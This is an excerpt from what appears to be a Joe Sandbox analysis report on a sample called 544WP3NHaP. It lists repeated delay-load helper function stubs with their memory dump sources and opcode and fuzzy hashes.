                                                                                                                                  • Opcode ID: 9cd1a3d7fdb505325a24abbebd1a2c1d70ff80537f38f294abafaea96a2e07c4
                                                                                                                                  • Instruction ID: 949110c5d33d34b38cad197094241771b85dfff9014c54a7ec389bada0c1b9e6
                                                                                                                                  • Opcode Fuzzy Hash: 9cd1a3d7fdb505325a24abbebd1a2c1d70ff80537f38f294abafaea96a2e07c4
                                                                                                                                  • Instruction Fuzzy Hash: FEB012D225C1097D315452592C02CF7028DF5C8B24330823FF414C13C0F8405C040432
                                                                                                                                  Function 008BE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 6132daa7a3c84f3505945a31c89981e79d62726d87cc873676f501e17014b6ea
                                                                                                                                  • Instruction ID: 25ecb0632ae09bb3be221f9b642b18587da1f02e99945a472dd1a4d1ff222a51
                                                                                                                                  • Opcode Fuzzy Hash: 6132daa7a3c84f3505945a31c89981e79d62726d87cc873676f501e17014b6ea
                                                                                                                                  • Instruction Fuzzy Hash: 07B012D125C1057C3154515A6D02CF702ADE4C4B24330833FF414C13C0FC405D410432
                                                                                                                                  Function 008BE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 58b306ec6146f5b7db72bc1d6b280189f3912623c3e0f7e57f697b7311f55ee9
                                                                                                                                  • Instruction ID: b81ed40a3cde1a4740cadfd8a700337bfd3d2f74bd0e089a746b4ad1577ce870
                                                                                                                                  • Opcode Fuzzy Hash: 58b306ec6146f5b7db72bc1d6b280189f3912623c3e0f7e57f697b7311f55ee9
                                                                                                                                  • Instruction Fuzzy Hash: C5B012D125C2057C319451596C07CF702ADE4C4B24330833FF414C13C0F8405C800432
                                                                                                                                  Function 008BE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 7c1baf927e908fa5ecd5d4629d5af7c04eae16cba5491291c9777f9271d6fc24
                                                                                                                                  • Instruction ID: 564fc8949812ee62527181a1547cb08c22716e7b741539a086b94500d4805c35
                                                                                                                                  • Opcode Fuzzy Hash: 7c1baf927e908fa5ecd5d4629d5af7c04eae16cba5491291c9777f9271d6fc24
                                                                                                                                  • Instruction Fuzzy Hash: 17B012C12995057C311421282C06CFB029DF0C1F14730823FF421C07C1A8405D040433
                                                                                                                                  Function 008BE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4d0e7cb437a0f1914a22f74f6f4d1928b9fe1d817260d7bb32906f75aa135dd1
                                                                                                                                  • Instruction ID: 08bb80d29294a5dda2be00f768389bbf4812634b319efc97e4d5d03a8e77d420
                                                                                                                                  • Opcode Fuzzy Hash: 4d0e7cb437a0f1914a22f74f6f4d1928b9fe1d817260d7bb32906f75aa135dd1
                                                                                                                                  • Instruction Fuzzy Hash: E2B012C229A5467C3114620D2D02CFB069DE0C1F14330C33FF515C03C0E8405C010433
                                                                                                                                  Function 008BE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 5f2628af3e55bd9a55f7f2d984744e8af747b268276bd1d1554b32eade8cc6ce
                                                                                                                                  • Instruction ID: 593c2347e32093177c22d26af6f9b3958a431f684540d25591a1b66a0e173dc5
                                                                                                                                  • Opcode Fuzzy Hash: 5f2628af3e55bd9a55f7f2d984744e8af747b268276bd1d1554b32eade8cc6ce
                                                                                                                                  • Instruction Fuzzy Hash: 77B012C229A5057D3114620C2C02DFB029DF0C1F14330833FF415C03C0E8405C040433
                                                                                                                                  Function 008BE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: ab2eac76612f8843b159a18be6266d946f81cafc044468ae12eacae27b37013a
                                                                                                                                  • Instruction ID: 737bc85e47849a9cc16a1f7909cf6ef39baa4d46435b5cc24868fda3cb660b82
                                                                                                                                  • Opcode Fuzzy Hash: ab2eac76612f8843b159a18be6266d946f81cafc044468ae12eacae27b37013a
                                                                                                                                  • Instruction Fuzzy Hash: A9B012C16996057C3214610C6C07CFB029DE0C1F14330C33FF415C03C0E8405C840433
                                                                                                                                  Function 008BE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: ac04fe57b9fa9c7aedef88862a45e37d65f1b188cf6ff2e03c04ee4681198281
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: ac04fe57b9fa9c7aedef88862a45e37d65f1b188cf6ff2e03c04ee4681198281
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: d6d91db13d2fd8dc2668b79d54b42c956668452730738fd5ed371fea1510b7e2
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: d6d91db13d2fd8dc2668b79d54b42c956668452730738fd5ed371fea1510b7e2
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 7bd9593b4e8e34efc61489cfa4df68b0eafbbac38e80afb452ae74210041253c
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 7bd9593b4e8e34efc61489cfa4df68b0eafbbac38e80afb452ae74210041253c
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4730ca02bf19e59ca8d92a420331a488aaed83ddc7ac1c2e2d74ae93027036a8
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4730ca02bf19e59ca8d92a420331a488aaed83ddc7ac1c2e2d74ae93027036a8
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4b53e48acfb03d35d879d72a5a39eb33d2717281b4c7e4493ec81c6466b48644
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4b53e48acfb03d35d879d72a5a39eb33d2717281b4c7e4493ec81c6466b48644
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 485a526209b4cfeefadb66cd16f34e66f57189c9025f92c0be49a7f83487cc21
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 485a526209b4cfeefadb66cd16f34e66f57189c9025f92c0be49a7f83487cc21
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 1a701ba5d55a359cbb14352a629c9bcc296431b4d9e21b4090d80b09c82bd0f6
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 1a701ba5d55a359cbb14352a629c9bcc296431b4d9e21b4090d80b09c82bd0f6
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
